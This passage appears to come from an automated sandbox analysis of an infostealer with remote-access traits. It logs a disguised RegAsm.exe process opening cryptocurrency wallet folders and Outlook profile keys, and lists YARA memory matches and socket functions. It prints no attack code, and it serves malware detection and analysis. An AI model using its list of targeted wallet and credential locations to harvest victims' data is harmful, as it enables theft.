Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7492, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3916, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7492, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 29.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.userIEHDAFHDHC.exe.38b5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.userIEHDAFHDHC.exe.38b5570.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: userIEHDAFHDHC.exe PID: 7444, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3916, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CD30C40 sqlite3_bind_zeroblob, 3_2_6CD30C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CD30D60 sqlite3_bind_parameter_name, 3_2_6CD30D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CC58EA0 sqlite3_clear_bindings, 3_2_6CC58EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CD30B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 3_2_6CD30B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAC6410 bind,WSAGetLastError, 29_2_6CAC6410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAC60B0 listen,WSAGetLastError, 29_2_6CAC60B0